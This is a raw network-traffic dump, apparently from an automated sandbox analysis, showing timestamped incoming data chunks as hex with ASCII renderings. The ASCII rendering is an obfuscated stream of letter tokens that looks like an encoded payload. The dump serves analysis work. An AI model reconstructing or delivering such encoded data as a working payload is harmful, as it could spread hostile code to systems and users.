20 4f 69 20 6e 50 20
                                                                                                Data Ascii: Ui TTg pO TSS TTM MP iU PS Pi Ui TTi TTn TSO TTi iO ii gT gO TTi Ui TTO TSP TSg gT gg MS Tp Up TTO OU pi On MS MM Mi nP OP TTi TTn TSP OT MTp nn pM Pi Ui TTU Oi TgP Tg pg iU PS PS TMn TPM TTn TMp pi PM iU TUT Pi Ui TTi On TSO TTM gP PS gn Tpn pp Oi Oi nP
                                                                                                2021-10-26 15:35:12 UTC3375INData Raw: 4f 50 20 54 54 54 20 54 53 4d 20 67 4f 20 4d 4f 20 67 4d 20 54 70 20 69 6e 20 54 53 70 20 54 54 6e 20 54 53 4f 20 54 54 70 20 69 4f 20 69 50 20 67 70 20 4d 70 20 4f 69 20 55 69 20 4d 70 20 50 20 54 54 4d 20 50 53 20 50 55 20 4d 69 20 54 70 20 54 4d 6e 20 54 50 55 20 55 67 20 6e 53 20 54 67 4d 20 69 4f 20 53 20 50 70 20 50 69 20 54 53 53 20 54 54 69 20 54 54 6e 20 54 53 4f 20 54 54 4d 20 50 53 20 69 55 20 50 53 20 50 4d 20 6e 70 20 54 53 69 20 55 55 20 54 53 67 20 55 70 20 6e 67 20 69 53 20 50 53 20 50 69 20 55 53 20 4f 50 20 54 54 50 20 6e 53 20 54 54 50 20 4d 53 20 4d 6e 20 54 4f 55 20 4d 55 20 55 70 20 54 54 54 20 54 53 50 20 70 69 20 4f 55 20 4d 53 20 6e 50 20 69 4d 20 50 69 20 55 69 20 54 54 55 20 54 54 55 20 54 4d 53 20 54 53 70 20 67 54 20 50 55 20
                                                                                                Data Ascii: OP TTT TSM gO MO gM Tp in TSp TTn TSO TTp iO iP gp Mp Oi Ui Mp P TTM PS PU Mi Tp TMn TPU Ug nS TgM iO S Pp Pi TSS TTi TTn TSO TTM PS iU PS PM np TSi UU TSg Up ng iS PS Pi US OP TTP nS TTP MS Mn TOU MU Up TTT TSP pi OU MS nP iM Pi Ui TTU TTU TMS TSp gT PU
                                                                                                2021-10-26 15:35:12 UTC3376INData Raw: 6e 20 55 69 20 4f 69 20 54 50 67 20 4f 53 20 69 55 20 69 4d 20 67 6e 20 4d 6e 20 6e 54 20 55 69 20 54 69 20 54 54 70 20 54 54 4d 20 50 53 20 50 4d 20 69 4f 20 69 53 20 6e 6e 20 4f 50 20 54 4d 70 20 6e 50 20 54 54 70 20 4f 67 20 4f 50 20 50 53 20 50 69 20 4f 69 20 55 55 20 55 67 20 6e 53 20 54 50 50 20 4d 53 20 4d 6e 20 54 4f 67 20 50 69 20 55 69 20 54 54 69 20 54 54 55 20 4f 67 20 54 4d 4d 20 50 53 20 4d 67 20 50 53 20 50 69 20 55 69 20 54 54 69 20 54 54 6e 20 54 53 4f 20 54 54 4d 20 69 55 20 69 67 20 69 67 20 4d 6e 20 4f 69 20 55 69 20 54 69 20 54 54 4f 20 54 54 4d 20 50 53 20 50 4d 20 67 54 20 69 55 20 54 4d 6e 20 54 54 67 20 55 67 20 6e 53 20 54 67 4d 20 4d 69 20 50 53 20 69 4d 20 69 4d 20 54 4d 54 20 54 4d 70 20 55 67 20 4d 4d 20 54 53 70 20 50 53 20
                                                                                                Data Ascii: n Ui Oi TPg OS iU iM gn Mn nT Ui Ti TTp TTM PS PM iO iS nn OP TMp nP TTp Og OP PS Pi Oi UU Ug nS TPP MS Mn TOg Pi Ui TTi TTU Og TMM PS Mg PS Pi Ui TTi TTn TSO TTM iU ig ig Mn Oi Ui Ti TTO TTM PS PM gT iU TMn TTg Ug nS TgM Mi PS iM iM TMT TMp Ug MM TSp PS
                                                                                                2021-10-26 15:35:12 UTC3377INData Raw: 4f 69 20 55 4f 20 54 54 6e 20 54 53 6e 20 54 54 70 20 67 70 20 69 4d 20 69 55 20 6e 6e 20 6e 4f 20 54 54 69 20 54 54 6e 20 54 53 50 20 54 54 20 67 70 20 69 55 20 50 53 20 50 53 20 55 54 20 4f 53 20 54 4f 69 20 54 53 4f 20 54 54 4d 20 50 4d 20 4d 70 20 50 53 20 50 69 20 55 69 20 54 54 67 20 70 4f 20 54 53 67 20 54 54 4d 20 70 54 20 69 55 20 50 53 20 50 69 20 55 69 20 54 54 69 20 54 54 6e 20 54 53 4f 20 54 54 50 20 69 70 20 69 67 20 67 54 20 69 4f 20 54 54 69 20 4f 53 20 4d 67 50 20 54 53 4f 20 54 54 4d 20 50 4d 20 4d 70 20 4d 53 20 4d 4f 20 54 70 67 20 54 54 69 20 54 54 54 20 70 4f 20 4d 67 6e 20 50 53 20 69 55 20 50 4d 20 4d 55 20 55 69 20 4f 6e 20 70 4f 20 54 53 50 20 54 54 4d 20 54 70 4f 20 69 55 20 50 53 20 50 69 20 6e 70 20 54 54 69 20 54 54 6e 20 54
                                                                                                Data Ascii: Oi UO TTn TSn TTp gp iM iU nn nO TTi TTn TSP TT gp iU PS PS UT OS TOi TSO TTM PM Mp PS Pi Ui TTg pO TSg TTM pT iU PS Pi Ui TTi TTn TSO TTP ip ig gT iO TTi OS MgP TSO TTM PM Mp MS MO Tpg TTi TTT pO Mgn PS iU PM MU Ui On pO TSP TTM TpO iU PS Pi np TTi TTn T
                                                                                                2021-10-26 15:35:12 UTC3379INData Raw: 20 54 54 55 20 50 6e 20 4d 67 55 20 69 70 20 50 55 20 54 4d 6e 20 54 55 4f 20 54 4d 53 20 6e 53 20 54 70 70 20 6e 4f 20 54 55 69 20 50 53 20 50 69 20 55 53 20 55 4f 20 54 70 4f 20 70 4f 20 70 53 20 50 53 20 69 55 20 50 70 20 67 4f 20 55 53 20 54 4d 54 20 4f 67 20 54 4d 20 54 54 4d 20 50 53 20 50 55 20 4d 67 70 20 50 69 20 55 67 20 55 55 20 54 53 4f 20 54 55 4f 20 54 54 67 20 67 69 20 69 55 20 50 53 20 50 69 20 55 69 20 54 4d 4d 20 54 54 6e 20 69 53 20 70 54 20 50 53 20 70 67 20 54 54 70 20 50 69 20 55 69 20 54 54 50 20 54 53 4d 20 4f 67 20 54 54 70 20 50 53 20 4f 70 20 50 53 20 50 69 20 55 69 20 54 53 50 20 54 54 6e 20 54 53 4f 20 4f 6e 20 69 55 20 70 6e 20 6e 4d 20 50 69 20 55 69 20 54 4d 53 20 54 54 53 20 70 69 20 54 4d 67 20 4d 53 20 50 50 20 4f 67 20
                                                                                                Data Ascii: TTU Pn MgU ip PU TMn TUO TMS nS Tpp nO TUi PS Pi US UO TpO pO pS PS iU Pp gO US TMT Og TM TTM PS PU Mgp Pi Ug UU TSO TUO TTg gi iU PS Pi Ui TMM TTn iS pT PS pg TTp Pi Ui TTP TSM Og TTp PS Op PS Pi Ui TSP TTn TSO On iU pn nM Pi Ui TMS TTS pi TMg MS PP Og
                                                                                                2021-10-26 15:35:12 UTC3380INData Raw: 20 54 53 4d 20 4f 54 20 4d 54 54 20 50 55 20 4d 50 20 4d 54 55 20 70 4f 20 54 54 4f 20 4d 70 20 4d 67 6e 20 54 54 4d 20 50 53 20 50 55 20 50 55 20 4f 4d 20 54 67 20 54 54 70 20 4d 50 54 20 4d 54 55 20 4d 70 20 4d 70 20 6e 54 20 50 53 20 50 69 20 4f 69 20 4d 6e 20 54 53 4d 20 54 53 6e 20 4f 6e 20 50 50 20 50 69 20 50 55 20 67 4f 20 55 4d 20 4d 4f 20 4d 69 6e 20 54 53 4f 20 54 54 4d 20 50 70 20 70 54 20 50 55 20 70 67 20 54 4d 20 54 4d 70 20 54 4d 50 20 54 53 6e 20 4d 50 69 20 54 67 67 20 67 20 4d 67 53 20 67 4f 20 55 54 20 4d 4f 20 54 4d 20 54 53 4f 20 54 54 4d 20 50 70 20 50 69 20 4d 69 20 67 6e 20 54 53 53 20 54 54 4f 20 54 54 6e 20 70 4f 20 54 54 4d 20 50 53 20 69 55 20 69 50 20 50 69 20 55 69 20 4f 4f 20 54 54 4f 20 54 54 70 20 54 53 69 20 70 50 20 6e
                                                                                                Data Ascii: TSM OT MTT PU MP MTU pO TTO Mp Mgn TTM PS PU PU OM Tg TTp MPT MTU Mp Mp nT PS Pi Oi Mn TSM TSn On PP Pi PU gO UM MO Min TSO TTM Pp pT PU pg TM TMp TMP TSn MPi Tgg g MgS gO UT MO TM TSO TTM Pp Pi Mi gn TSS TTO TTn pO TTM PS iU iP Pi Ui OO TTO TTp TSi pP n
                                                                                                2021-10-26 15:35:12 UTC3381INData Raw: 20 4d 50 20 50 54 20 4d 53 20 4d 4f 20 54 6e 67 20 54 54 4d 20 4f 55 20 54 54 4d 20 4f 67 20 50 55 20 4d 4d 20 4f 67 20 54 4d 54 20 55 69 20 54 54 69 20 54 54 50 20 6e 53 20 4f 4f 20 4d 53 20 4d 6e 20 54 4f 70 20 50 4d 20 6e 4f 20 54 53 53 20 55 4f 20 54 53 54 20 55 70 20 4f 67 20 4f 70 20 50 53 20 50 69 20 55 4d 20 55 4f 20 54 54 55 20 6e 50 20 4f 54 20 54 4f 70 20 4d 70 20 50 53 20 50 69 20 55 6e 20 70 70 20 54 4d 69 20 54 53 4f 20 4f 54 20 50 53 20 69 55 20 50 53 20 50 69 20 55 69 20 54 54 69 20 54 54 6e 20 54 54 54 20 54 54 20 4d 67 20 69 55 20 50 53 20 50 53 20 54 4d 53 20 54 54 50 20 4f 50 20 54 54 54 20 54 53 67 20 67 70 20 4d 55 20 67 70 20 54 70 20 54 54 69 20 54 54 4d 20 54 69 20 6e 50 20 54 54 4d 20 50 53 20 50 4d 20 67 70 20 50 4d 20 69 6e 20
                                                                                                Data Ascii: MP PT MS MO Tng TTM OU TTM Og PU MM Og TMT Ui TTi TTP nS OO MS Mn TOp PM nO TSS UO TST Up Og Op PS Pi UM UO TTU nP OT TOp Mp PS Pi Un pp TMi TSO OT PS iU PS Pi Ui TTi TTn TTT TT Mg iU PS PS TMS TTP OP TTT TSg gp MU gp Tp TTi TTM Ti nP TTM PS PM gp PM in
                                                                                                2021-10-26 15:35:12 UTC3383INData Raw: 53 20 54 55 53 20 55 69 20 54 54 69 20 54 54 6e 20 6e 4f 20 54 54 4d 20 50 53 20 67 67 20 69 55 20 6e 6e 20 54 4d 50 20 54 54 69 20 54 54 6e 20 54 53 50 20 54 53 50 20 67 54 20 50 6e 20 4d 53 20 69 55 20 54 4d 69 20 4d 50 54 20 54 54 6e 20 54 53 4f 20 54 4d 4d 20 4d 50 20 50 54 20 50 70 20 4d 4f 20 54 70 54 20 54 54 4d 20 54 69 20 70 55 20 54 54 4d 20 50 53 20 50 4d 20 69 4f 20 55 4f 20 4d 54 70 20 54 54 69 20 54 54 6e 20 54 53 67 20 4f 4d 20 4d 4f 20 50 53 20 6e 67 20 67 54 20 55 69 20 54 54 69 20 54 54 67 20 54 54 53 20 67 54 20 54 4f 54 20 69 55 20 50 53 20 70 53 20 55 53 20 4f 53 20 67 4f 20 54 53 4f 20 54 54 4d 20 50 70 20 4f 50 20 4f 6e 20 50 69 20 55 69 20 54 4d 53 20 55 4f 20 54 54 54 20 54 6e 69 20 54 54 67 20 50 53 20 6e 67 20 67 54 20 55 69 20
                                                                                                Data Ascii: S TUS Ui TTi TTn nO TTM PS gg iU nn TMP TTi TTn TSP TSP gT Pn MS iU TMi MPT TTn TSO TMM MP PT Pp MO TpT TTM Ti pU TTM PS PM iO UO MTp TTi TTn TSg OM MO PS ng gT Ui TTi TTg TTS gT TOT iU PS pS US OS gO TSO TTM Pp OP On Pi Ui TMS UO TTT Tni TTg PS ng gT Ui
                                                                                                2021-10-26 15:35:12 UTC3384INData Raw: 53 20 50 4d 20 4f 67 20 54 70 69 20 55 69 20 54 54 69 20 54 4d 6e 20 54 54 4d 20 4f 67 20 50 4d 20 4d 4d 20 4d 50 20 54 4d 20 55 55 20 55 4f 20 54 50 67 20 54 53 4d 20 4f 54 20 4d 53 4d 20 50 70 20 67 4d 20 69 55 20 6e 53 20 54 54 50 20 4f 67 20 4d 50 69 20 54 54 4d 20 50 53 20 50 55 20 67 67 20 50 53 20 6e 53 20 54 54 55 20 4f 67 20 4d 69 4f 20 54 54 4d 20 50 53 20 50 55 20 67 4d 20 50 50 20 54 4d 69 20 4d 4d 50 20 54 54 6e 20 54 53 4f 20 54 4d 4d 20 67 67 20 50 67 20 67 4d 20 50 54 20 54 4d 69 20 4d 67 54 20 54 54 6e 20 54 53 4f 20 54 4d 4d 20 4d 70 20 4f 55 20 50 53 20 50 69 20 4f 69 20 4f 53 20 4d 4d 6e 20 54 53 4f 20 54 54 4d 20 50 70 20 67 67 20 50 4d 20 55 4f 20 54 4f 50 20 54 54 69 20 54 54 6e 20 54 53 67 20 4f 55 20 50 54 20 4d 69 20 54 6e 53 20
                                                                                                Data Ascii: S PM Og Tpi Ui TTi TMn TTM Og PM MM MP TM UU UO TPg TSM OT MSM Pp gM iU nS TTP Og MPi TTM PS PU gg PS nS TTU Og MiO TTM PS PU gM PP TMi MMP TTn TSO TMM gg Pg gM PT TMi MgT TTn TSO TMM Mp OU PS Pi Oi OS MMn TSO TTM Pp gg PM UO TOP TTi TTn TSg OU PT Mi TnS
                                                                                                2021-10-26 15:35:12 UTC3385INData Raw: 20 54 54 55 20 4d 70 20 6e 67 20 50 53 20 50 69 20 55 4d 20 4f 53 20 54 69 20 54 53 4f 20 54 54 4d 20 50 4d 20 4d 69 20 6e 55 20 50 69 20 55 69 20 54 54 70 20 4f 67 20 54 50 20 54 54 4d 20 50 53 20 50 69 20 4d 70 20 55 4d 20 55 69 20 54 54 69 20 54 54 50 20 54 4f 20 6e 54 20 50 53 20 69 55 20 50 69 20 4d 70 20 4f 69 20 4f 53 20 54 55 20 54 53 4f 20 54 54 4d 20 50 4d 20 4d 69 20 55 69 20 50 69 20 55 69 20 54 54 70 20 4f 67 20 4d 69 53 20 54 54 4d 20 50 53 20 50 69 20 4d 70 20 54 53 50 20 55 69 20 54 54 69 20 54 54 50 20 70 4f 20 4d 50 53 20 50 53 20 69 55 20 50 4d 20 4d 55 20 55 69 20 54 54 69 20 54 54 6e 20 54 54 53 20 70 69 20 50 69 20 69 55 20 6e 6e 20 50 69 20 55 69 20 54 54 69 20 54 54 6e 20 54 53 4f 20 54 54 4d 20 50 53 20 4d 69 20 54 55 67 20 50 69
                                                                                                Data Ascii: TTU Mp ng PS Pi UM OS Ti TSO TTM PM Mi nU Pi Ui TTp Og TP TTM PS Pi Mp UM Ui TTi TTP TO nT PS iU Pi Mp Oi OS TU TSO TTM PM Mi Ui Pi Ui TTp Og MiS TTM PS Pi Mp TSP Ui TTi TTP pO MPS PS iU PM MU Ui TTi TTn TTS pi Pi iU nn Pi Ui TTi TTn TSO TTM PS Mi TUg Pi
                                                                                                2021-10-26 15:35:12 UTC3387INData Raw: 54 69 20 54 54 67 20 55 50 20 54 6e 20 4d 53 50 20 4d 53 6e 20 4d 53 50 20 50 69 20 6e 4f 20 70 70 20 54 54 67 20 54 53 4f 20 67 20 50 53 20 69 55 20 50 53 20 54 6e 20 55 69 20 54 54 69 20 54 53 53 20 6e 6e 20 67 69 20 54 55 20 4d 4d 69 20 69 69 20 67 53 20 54 6e 54 20 54 54 69 20 54 54 6e 20 54 53 6e 20 55 55 20 54 67 50 20 69 55 20 50 53 20 69 55 20 69 4d 20 70 69 20 54 54 6e 20 54 53 4f 20 54 54 70 20 4f 67 20 54 70 4d 20 50 53 20 50 69 20 4f 69 20 54 53 70 20 55 55 20 54 54 53 20 55 70 20 4d 50 20 54 53 20 50 6e 20 4d 4f 20 54 6e 50 20 4f 70 20 54 54 70 20 70 4f 20 4d 4d 6e 20 50 53 20 69 55 20 50 70 20 69 69 20 54 4d 54 20 55 55 20 55 67 20 6e 6e 20 4d 20 54 55 20 4d 4d 69 20 69 69 20 67 53 20 54 6e 54 20 54 54 69 20 54 54 6e 20 54 53 6e 20 4f 55 20
                                                                                                Data Ascii: Ti TTg UP Tn MSP MSn MSP Pi nO pp TTg TSO g PS iU PS Tn Ui TTi TSS nn gi TU MMi ii gS TnT TTi TTn TSn UU TgP iU PS iU iM pi TTn TSO TTp Og TpM PS Pi Oi TSp UU TTS Up MP TS Pn MO TnP Op TTp pO MMn PS iU Pp ii TMT UU Ug nn M TU MMi ii gS TnT TTi TTn TSn OU
                                                                                                2021-10-26 15:35:12 UTC3388INData Raw: 4f 20 54 4d 4d 20 67 54 20 4d 53 4f 20 4d 67 70 20 70 20 6e 53 20 54 4d 54 20 54 67 4f 20 54 4d 67 20 54 53 69 20 50 53 20 69 55 20 69 54 20 55 4f 20 50 50 20 54 54 69 20 54 54 6e 20 54 53 67 20 54 6e 4d 20 4d 67 70 20 54 70 20 4d 67 20 67 53 20 4d 69 20 54 54 69 20 54 54 6e 20 54 53 67 20 4f 4f 20 50 67 20 67 67 20 50 67 20 4d 4d 20 70 69 20 55 4d 20 54 70 50 20 54 54 50 20 55 55 20 4d 53 50 20 69 55 20 50 53 20 69 55 20 54 4d 69 20 54 4f 55 20 54 54 6e 20 54 53 4f 20 54 54 55 20 4d 70 20 55 54 20 50 53 20 50 69 20 4f 69 20 54 6e 4d 20 54 54 6e 20 6e 54 20 54 53 67 20 67 6e 20 69 4f 20 4d 70 20 50 69 20 55 69 20 54 54 4d 20 54 54 6e 20 54 4f 20 54 54 4d 20 54 54 4d 20 4d 69 53 20 50 53 20 50 70 20 55 69 20 54 54 69 20 54 54 6e 20 54 53 4f 20 54 54 69 20
                                                                                                Data Ascii: O TMM gT MSO Mgp p nS TMT TgO TMg TSi PS iU iT UO PP TTi TTn TSg TnM Mgp Tp Mg gS Mi TTi TTn TSg OO Pg gg Pg MM pi UM TpP TTP UU MSP iU PS iU TMi TOU TTn TSO TTU Mp UT PS Pi Oi TnM TTn nT TSg gn iO Mp Pi Ui TTM TTn TO TTM TTM MiS PS Pp Ui TTi TTn TSO TTi
                                                                                                2021-10-26 15:35:12 UTC3389INData Raw: 53 20 50 69 20 6e 4f 20 4d 69 4d 20 70 70 20 54 53 4f 20 54 54 4d 20 50 69 20 6e 55 20 50 20 50 69 20 55 69 20 54 54 55 20 4f 67 20 54 67 20 54 54 67 20 50 53 20 50 69 20 54 6e 55 20 53 20 55 69 20 54 54 69 20 54 54 67 20 54 54 6e 20 54 4d 54 20 54 55 55 20 54 67 50 20 67 6e 20 54 54 54 20 6e 54 20 54 54 6e 20 54 53 4d 20 54 53 50 20 6e 4d 20 4d 54 70 20 69 55 20 50 53 20 50 69 20 6e 53 20 54 54 4f 20 54 67 4f 20 54 4d 53 20 4f 70 20 50 53 20 69 55 20 69 55 20 67 70 20 55 54 20 54 4d 67 20 54 53 53 20 54 53 50 20 4d 67 69 20 6e 50 20 54 4d 53 20 50 53 20 50 69 20 55 50 20 67 20 70 54 20 54 53 4f 20 54 54 4d 20 50 54 20 6e 6e 20 69 50 20 50 69 20 55 69 20 54 54 55 20 54 53 67 20 54 53 69 20 54 4d 54 20 67 50 20 50 4d 20 67 6e 20 54 54 53 20 4d 53 70 20 54
                                                                                                Data Ascii: S Pi nO MiM pp TSO TTM Pi nU P Pi Ui TTU Og Tg TTg PS Pi TnU S Ui TTi TTg TTn TMT TUU TgP gn TTT nT TTn TSM TSP nM MTp iU PS Pi nS TTO TgO TMS Op PS iU iU gp UT TMg TSS TSP Mgi nP TMS PS Pi UP g pT TSO TTM PT nn iP Pi Ui TTU TSg TSi TMT gP PM gn TTS MSp T
                                                                                                2021-10-26 15:35:12 UTC3391INData Raw: 50 20 54 54 69 20 54 54 6e 20 54 53 67 20 54 4d 53 20 6e 70 20 6e 20 50 53 20 50 69 20 55 53 20 4d 4f 20 69 70 20 54 53 4f 20 54 54 4d 20 50 70 20 4d 6e 20 69 4f 20 50 55 20 54 4d 6e 20 54 69 70 20 54 54 20 55 6e 20 54 54 4d 20 50 53 20 50 4d 20 4f 67 20 54 53 69 20 55 69 20 54 54 69 20 54 4d 6e 20 54 4d 67 20 4f 4d 20 69 4f 20 4d 4d 20 4d 50 20 54 53 4d 20 6e 54 20 54 54 4f 20 4f 69 20 54 50 54 20 4f 55 20 50 50 20 4d 69 20 54 53 4f 20 50 69 20 55 69 20 54 4d 53 20 54 4d 53 20 54 53 53 20 54 54 20 67 4d 20 69 55 20 50 53 20 50 53 20 54 4d 54 20 54 54 4d 20 4f 69 20 55 6e 20 54 4d 53 20 50 4f 20 6e 50 20 67 50 20 50 69 20 55 69 20 54 54 55 20 4d 69 4f 20 67 6e 20 54 54 4d 20 50 53 20 69 4f 20 4f 67 20 54 53 4f 20 55 69 20 54 54 69 20 54 4d 6e 20 54 53 54
                                                                                                Data Ascii: P TTi TTn TSg TMS np n PS Pi US MO ip TSO TTM Pp Mn iO PU TMn Tip TT Un TTM PS PM Og TSi Ui TTi TMn TMg OM iO MM MP TSM nT TTO Oi TPT OU PP Mi TSO Pi Ui TMS TMS TSS TT gM iU PS PS TMT TTM Oi Un TMS PO nP gP Pi Ui TTU MiO gn TTM PS iO Og TSO Ui TTi TMn TST
                                                                                                2021-10-26 15:35:12 UTC3392INData Raw: 70 20 55 69 20 54 54 69 20 54 54 67 20 54 53 54 20 4f 55 20 50 53 20 6e 50 20 54 70 20 50 69 20 55 69 20 54 54 55 20 55 20 54 4d 70 20 54 54 4d 20 50 53 20 50 4d 20 50 55 20 67 70 20 55 69 20 4f 20 55 69 20 54 53 4f 20 54 54 4d 20 50 69 20 6e 6e 20 67 55 20 50 69 20 55 69 20 54 54 55 20 54 53 67 20 54 53 4f 20 54 54 20 54 70 20 69 55 20 50 53 20 50 53 20 4f 4d 20 4f 53 20 4f 54 20 54 53 55 20 54 54 4d 20 50 4d 20 4d 6e 20 50 4d 20 70 54 20 54 4d 6e 20 4d 53 55 20 54 4d 6e 20 6e 53 20 4d 54 55 20 67 4d 20 50 54 20 4d 70 20 54 67 67 20 55 69 20 54 54 69 20 54 4d 6e 20 70 69 20 4d 50 54 20 4d 67 70 20 70 4d 20 67 4d 20 50 67 20 54 6e 53 20 54 53 53 20 4f 4f 20 54 53 4f 20 54 54 4d 20 69 54 20 4f 50 20 55 54 20 50 69 20 55 69 20 54 4d 53 20 54 70 4f 20 54 4f
                                                                                                Data Ascii: p Ui TTi TTg TST OU PS nP Tp Pi Ui TTU U TMp TTM PS PM PU gp Ui O Ui TSO TTM Pi nn gU Pi Ui TTU TSg TSO TT Tp iU PS PS OM OS OT TSU TTM PM Mn PM pT TMn MSU TMn nS MTU gM PT Mp Tgg Ui TTi TMn pi MPT Mgp pM gM Pg TnS TSS OO TSO TTM iT OP UT Pi Ui TMS TpO TO
                                                                                                2021-10-26 15:35:12 UTC3393INData Raw: 50 69 20 54 70 20 54 54 50 20 4d 67 20 54 67 4d 20 54 53 55 20 4f 67 20 54 69 70 20 54 54 4d 20 50 53 20 50 69 20 6e 70 20 6e 6e 20 55 69 20 54 54 69 20 54 54 67 20 4d 4d 50 20 55 53 20 50 53 20 69 55 20 50 54 20 55 4f 20 54 4d 20 54 54 69 20 54 54 6e 20 54 53 6e 20 54 69 20 4f 20 69 55 20 50 53 20 50 53 20 54 54 70 20 69 20 55 69 20 54 55 4f 20 54 54 53 20 4d 70 20 4d 53 6e 20 50 53 20 50 69 20 55 4d 20 54 4d 20 4f 20 54 53 4f 20 54 54 4d 20 50 69 20 54 55 55 20 54 55 20 50 69 20 55 69 20 54 54 50 20 4d 70 20 50 67 20 54 54 4d 20 50 53 20 50 69 20 6e 70 20 54 67 20 55 69 20 54 54 69 20 54 54 67 20 6e 6e 20 4d 4f 20 54 4f 20 4d 4d 69 20 69 69 20 67 53 20 54 6e 54 20 54 54 69 20 54 54 6e 20 54 53 6e 20 54 69 20 6e 4f 20 69 55 20 50 53 20 50 53 20 50 4f 20
                                                                                                Data Ascii: Pi Tp TTP Mg TgM TSU Og Tip TTM PS Pi np nn Ui TTi TTg MMP US PS iU PT UO TM TTi TTn TSn Ti O iU PS PS TTp i Ui TUO TTS Mp MSn PS Pi UM TM O TSO TTM Pi TUU TU Pi Ui TTP Mp Pg TTM PS Pi np Tg Ui TTi TTg nn MO TO MMi ii gS TnT TTi TTn TSn Ti nO iU PS PS PO
                                                                                                2021-10-26 15:35:12 UTC3394INData Raw: 20 50 4d 20 67 53 20 50 67 20 54 54 69 20 54 54 6e 20 54 53 67 20 54 6e 69 20 50 53 20 4d 70 20 50 54 20 67 55 20 55 69 20 54 54 69 20 54 54 6e 20 54 53 4f 20 4f 55 20 50 53 20 4f 4f 20 55 6e 20 50 69 20 6e 69 20 50 4d 20 54 54 6e 20 54 53 4f 20 54 54 67 20 67 67 20 53 20 50 4d 20 50 69 20 55 50 20 54 54 50 20 54 54 6e 20 54 53 4f 20 4f 69 20 50 53 20 69 55 20 67 50 20 67 53 20 50 55 20 54 54 69 20 54 54 6e 20 54 53 6e 20 54 53 4d 20 67 53 20 50 6e 20 4d 53 20 69 4f 20 54 53 4f 20 54 67 53 20 54 54 6e 20 54 53 4f 20 54 54 4d 20 4d 50 20 50 54 20 50 6e 20 4d 4f 20 54 70 54 20 54 54 6e 20 70 20 54 6e 53 20 54 54 4d 20 50 53 20 50 55 20 69 67 20 54 4d 20 54 67 67 20 54 54 69 20 54 54 6e 20 54 53 4f 20 55 70 20 67 50 20 50 67 20 70 50 20 4d 50 69 20 55 69 20
                                                                                                Data Ascii: PM gS Pg TTi TTn TSg Tni PS Mp PT gU Ui TTi TTn TSO OU PS OO Un Pi ni PM TTn TSO TTg gg S PM Pi UP TTP TTn TSO Oi PS iU gP gS PU TTi TTn TSn TSM gS Pn MS iO TSO TgS TTn TSO TTM MP PT Pn MO TpT TTn p TnS TTM PS PU ig TM Tgg TTi TTn TSO Up gP Pg pP MPi Ui
                                                                                                2021-10-26 15:35:12 UTC3396INData Raw: 54 4f 54 20 50 53 20 50 69 20 4f 69 20 54 54 70 20 54 53 4f 20 50 67 20 54 4d 4d 20 50 4d 20 50 6e 20 67 20 54 50 6e 20 54 4d 70 20 4f 6e 20 70 4f 20 54 53 69 20 54 54 4d 20 4d 67 50 20 69 55 20 50 53 20 50 69 20 54 53 53 20 54 54 69 20 54 54 6e 20 54 4d 69 20 54 54 69 20 54 55 55 20 54 67 50 20 67 70 20 50 20 55 50 20 55 55 20 54 54 4f 20 54 4d 67 20 4d 67 69 20 6e 50 20 4d 20 50 53 20 50 69 20 55 50 20 67 20 6e 54 20 54 53 4f 20 54 54 4d 20 50 54 20 67 55 20 67 53 20 67 53 20 54 54 69 20 54 54 4d 20 4f 55 20 4d 69 6e 20 69 20 50 70 20 69 55 20 50 53 20 69 50 20 6e 69 20 4f 50 20 55 70 20 6e 50 20 54 69 20 50 20 69 55 20 50 53 20 50 53 20 54 4d 69 20 54 55 20 54 54 70 20 54 53 4f 20 54 54 55 20 69 67 20 4d 4f 20 69 70 20 54 70 20 6e 70 20 54 54 4d 20 4d
                                                                                                Data Ascii: TOT PS Pi Oi TTp TSO Pg TMM PM Pn g TPn TMp On pO TSi TTM MgP iU PS Pi TSS TTi TTn TMi TTi TUU TgP gp P UP UU TTO TMg Mgi nP M PS Pi UP g nT TSO TTM PT gU gS gS TTi TTM OU Min i Pp iU PS iP ni OP Up nP Ti P iU PS PS TMi TU TTp TSO TTU ig MO ip Tp np TTM M
                                                                                                2021-10-26 15:35:12 UTC3397INData Raw: 50 55 20 50 4d 20 4d 55 20 55 69 20 54 54 70 20 4f 50 20 54 53 4f 20 54 54 4d 20 67 67 20 53 20 50 4d 20 50 69 20 4f 55 20 54 54 69 20 54 54 6e 20 54 53 4f 20 70 70 20 50 53 20 69 55 20 67 50 20 67 70 20 55 50 20 54 54 4d 20 54 54 53 20 54 4d 4d 20 4f 67 20 4d 6e 20 4d 4d 20 4d 4d 70 20 54 55 6e 20 55 69 20 54 54 69 20 54 54 70 20 70 4f 20 50 69 20 50 53 20 69 55 20 50 70 20 67 4d 20 50 4f 20 54 70 4d 20 54 54 6e 20 54 53 4f 20 54 4d 4d 20 67 70 20 54 6e 53 20 6e 53 20 54 55 6e 20 55 69 20 54 54 69 20 54 54 70 20 4d 20 54 70 54 20 50 53 20 69 55 20 50 70 20 67 53 20 54 67 69 20 54 54 69 20 54 54 6e 20 54 53 67 20 54 54 4f 20 69 67 20 69 50 20 67 54 20 50 54 20 54 54 69 20 55 55 20 55 67 20 6e 53 20 54 70 50 20 4d 53 20 4d 6e 20 4d 53 67 20 50 69 20 55 69
                                                                                                Data Ascii: PU PM MU Ui TTp OP TSO TTM gg S PM Pi OU TTi TTn TSO pp PS iU gP gp UP TTM TTS TMM Og Mn MM MMp TUn Ui TTi TTp pO Pi PS iU Pp gM PO TpM TTn TSO TMM gp TnS nS TUn Ui TTi TTp M TpT PS iU Pp gS Tgi TTi TTn TSg TTO ig iP gT PT TTi UU Ug nS TpP MS Mn MSg Pi Ui
                                                                                                2021-10-26 15:35:12 UTC3398INData Raw: 50 69 20 55 69 20 4f 53 20 54 6e 54 20 54 53 4f 20 54 54 4d 20 50 70 20 50 50 20 54 55 20 4d 53 69 20 55 69 20 54 54 69 20 54 54 6e 20 50 67 20 54 4d 67 20 50 67 20 50 70 20 67 20 54 69 4d 20 54 4d 69 20 4d 50 53 20 54 54 6e 20 54 53 4f 20 54 54 55 20 4d 69 20 54 4d 70 20 4d 70 20 54 54 4f 20 55 50 20 54 54 69 20 54 54 50 20 54 4d 67 20 4f 69 20 50 70 20 4d 69 20 54 54 50 20 50 50 20 55 69 20 54 54 70 20 4f 67 20 54 6e 4f 20 54 54 4d 20 50 53 20 50 55 20 4d 69 20 54 4d 53 20 54 4d 69 20 6e 67 20 54 54 70 20 54 53 4f 20 54 54 55 20 67 54 20 69 4f 20 4d 69 20 67 53 20 54 67 4f 20 54 54 69 20 54 54 6e 20 54 53 67 20 55 55 20 54 55 4d 20 69 55 20 50 53 20 69 55 20 54 4d 70 20 54 53 50 20 70 4f 20 54 54 53 20 54 54 4d 20 70 70 20 69 55 20 50 